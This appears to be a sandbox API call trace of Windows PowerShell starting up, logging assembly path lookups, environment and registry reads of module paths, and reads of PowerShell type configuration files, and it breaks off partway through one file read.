	[0715.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0719.466] SetConsoleCtrlHandler (HandlerRoutine=0x2a1689c, Add=1) returned 1
	[0719.478] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0719.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0719.478] CoTaskMemFree (pv=0x1b6e3570) 
	[0721.118] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0721.120] CoCreateGuid (in: pguid=0xedb30 | out: pguid=0xedb30*(Data1=0x2c12566f, Data2=0xe5b5, Data3=0x450e, Data4=([0]=0x89, [1]=0xf1, [2]=0xe, [3]=0x27, [4]=0x56, [5]=0xe7, [6]=0x5d, [7]=0xd6))) returned 0x0
	[0721.122] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0721.122] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0721.122] CoTaskMemFree (pv=0x1b6e3570) 
	[0721.145] WinSqmIsOptedIn () returned 0x0
	[0721.145] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0721.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0721.145] CoTaskMemFree (pv=0x1b6e3570) 
	[0721.146] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0721.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0721.146] CoTaskMemFree (pv=0x1b6e3570) 
	[0721.146] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0721.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0721.147] CoTaskMemFree (pv=0x1b6e3570) 
	[0721.147] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0721.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0721.147] CoTaskMemFree (pv=0x1b6e3570) 
	[0721.148] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0721.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0721.148] CoTaskMemFree (pv=0x1b6e3570) 
	[0721.149] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0721.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0721.149] CoTaskMemFree (pv=0x1b6e3570) 
	[0721.150] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0721.150] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0721.150] CoTaskMemFree (pv=0x1b6e3570) 
	[0721.150] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0721.150] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0721.150] CoTaskMemFree (pv=0x1b6e3570) 
	[0722.601] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0722.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.601] CoTaskMemFree (pv=0x1b6e3570) 
	[0722.606] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0722.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.606] CoTaskMemFree (pv=0x1b6e3570) 
	[0722.606] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0722.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.606] CoTaskMemFree (pv=0x1b6e3570) 
	[0722.607] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0722.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.607] CoTaskMemFree (pv=0x1b6e3570) 
	[0727.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0727.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0727.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0727.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.325] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0731.325] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0731.326] CoTaskMemFree (pv=0x1b6e3570) 
	[0731.327] CoTaskMemAlloc (cb=0xcc) returned 0x1b6e0b30
	[0731.327] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b6e0b30, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0731.327] CoTaskMemFree (pv=0x1b6e0b30) 
	[0731.327] CoTaskMemAlloc (cb=0xf0) returned 0x1b6dd850
	[0731.327] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b6dd850, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0731.327] CoTaskMemFree (pv=0x1b6dd850) 
	[0731.328] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xed6a8 | out: phkResult=0xed6a8*=0x31c) returned 0x0
	[0731.328] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed62c, lpData=0x0, lpcbData=0xed628*=0x0 | out: lpType=0xed62c*=0x2, lpData=0x0, lpcbData=0xed628*=0x6c) returned 0x0
	[0731.328] CoTaskMemAlloc (cb=0x70) returned 0x3420b0
	[0731.328] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed5fc, lpData=0x3420b0, lpcbData=0xed5f8*=0x6c | out: lpType=0xed5fc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xed5f8*=0x6c) returned 0x0
	[0731.328] CoTaskMemFree (pv=0x3420b0) 
	[0731.328] CoTaskMemAlloc (cb=0xcc) returned 0x1b6e0b30
	[0731.328] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b6e0b30, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0731.328] CoTaskMemFree (pv=0x1b6e0b30) 
	[0731.328] CoTaskMemAlloc (cb=0xcc) returned 0x1b6e0b30
	[0731.328] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b6e0b30, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0731.328] CoTaskMemFree (pv=0x1b6e0b30) 
	[0731.332] RegCloseKey (hKey=0x31c) returned 0x0
	[0731.332] CoTaskMemAlloc (cb=0xcc) returned 0x1b6e0b30
	[0731.332] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b6e0b30, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0731.332] CoTaskMemFree (pv=0x1b6e0b30) 
	[0731.332] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xed6a8 | out: phkResult=0xed6a8*=0x31c) returned 0x0
	[0731.332] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed62c, lpData=0x0, lpcbData=0xed628*=0x0 | out: lpType=0xed62c*=0x0, lpData=0x0, lpcbData=0xed628*=0x0) returned 0x2
	[0731.333] RegCloseKey (hKey=0x31c) returned 0x0
	[0731.345] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0731.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.345] CoTaskMemFree (pv=0x1b6e3570) 
	[0731.347] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0731.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.347] CoTaskMemFree (pv=0x1b6e3570) 
	[0731.349] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0731.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.349] CoTaskMemFree (pv=0x1b6e3570) 
	[0731.349] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0731.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.349] CoTaskMemFree (pv=0x1b6e3570) 
	[0731.351] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed498 | out: phkResult=0xed498*=0x31c) returned 0x0
	[0731.351] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0xed4ac, lpData=0x0, lpcbData=0xed4a8*=0x0 | out: lpType=0xed4ac*=0x1, lpData=0x0, lpcbData=0xed4a8*=0x74) returned 0x0
	[0731.351] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0xed41c, lpData=0x0, lpcbData=0xed418*=0x0 | out: lpType=0xed41c*=0x1, lpData=0x0, lpcbData=0xed418*=0x74) returned 0x0
	[0731.351] CoTaskMemAlloc (cb=0x78) returned 0x3420b0
	[0731.351] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0xed3ec, lpData=0x3420b0, lpcbData=0xed3e8*=0x74 | out: lpType=0xed3ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xed3e8*=0x74) returned 0x0
	[0731.352] CoTaskMemFree (pv=0x3420b0) 
	[0731.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xed160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0731.352] SetErrorMode (uMode=0x1) returned 0x1
	[0731.352] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xed370 | out: lpFileInformation=0xed370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0731.352] SetErrorMode (uMode=0x1) returned 0x1
	[0731.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xed160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0731.353] SetErrorMode (uMode=0x1) returned 0x1
	[0731.353] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed370 | out: lpFileInformation=0xed370*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0731.353] SetErrorMode (uMode=0x1) returned 0x1
	[0731.354] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0731.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.355] CoTaskMemFree (pv=0x1b6e3570) 
	[0731.355] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0731.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.356] CoTaskMemFree (pv=0x1b6e3570) 
	[0731.356] GetACP () returned 0x4e4
	[0732.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0732.829] SetErrorMode (uMode=0x1) returned 0x1
	[0732.830] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0732.831] GetFileType (hFile=0x324) returned 0x1
	[0732.831] SetErrorMode (uMode=0x1) returned 0x1
	[0732.831] GetFileType (hFile=0x324) returned 0x1
	[0732.835] ReadFile (in: hFile=0x324, lpBuffer=0x2d10f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d10f00*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0732.838] ReadFile (in: hFile=0x324, lpBuffer=0x2d10f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d10f00*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0732.838] ReadFile (in: hFile=0x324, lpBuffer=0x2d10f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d10f00*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0732.838] ReadFile (in: hFile=0x324, lpBuffer=0x2d10f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d10f00*, lpNumberOfBytesRead=0xed2a8*=0xcf3, lpOverlapped=0x0) returned 1
	[0732.838] ReadFile (in: hFile=0x324, lpBuffer=0x2d1035b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d1035b*, lpNumberOfBytesRead=0xed2a8*=0x0, lpOverlapped=0x0) returned 1
	[0732.838] ReadFile (in: hFile=0x324, lpBuffer=0x2d10f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d10f00*, lpNumberOfBytesRead=0xed2a8*=0x0, lpOverlapped=0x0) returned 1
	[0732.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0732.841] SetErrorMode (uMode=0x1) returned 0x1
	[0732.841] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed220 | out: lpFileInformation=0xed220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0732.841] SetErrorMode (uMode=0x1) returned 0x1
	[0732.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0732.847] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed308 | out: phkResult=0xed308*=0x324) returned 0x0
	[0732.847] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed28c, lpData=0x0, lpcbData=0xed288*=0x0 | out: lpType=0xed28c*=0x1, lpData=0x0, lpcbData=0xed288*=0x56) returned 0x0
	[0732.847] CoTaskMemAlloc (cb=0x5a) returned 0x1b6d94f0
	[0732.847] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed25c, lpData=0x1b6d94f0, lpcbData=0xed258*=0x56 | out: lpType=0xed25c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed258*=0x56) returned 0x0
	[0732.847] CoTaskMemFree (pv=0x1b6d94f0) 
	[0732.847] RegCloseKey (hKey=0x324) returned 0x0
	[0732.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0732.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xece00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0734.325] VirtualQuery (in: lpAddress=0xebff0, lpBuffer=0xeceb0, dwLength=0x30 | out: lpBuffer=0xeceb0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0735.748] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0735.748] GetFileType (hFile=0x324) returned 0x1
	[0735.748] SetErrorMode (uMode=0x1) returned 0x1
	[0735.748] GetFileType (hFile=0x324) returned 0x1
	[0735.748] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.749] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.750] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
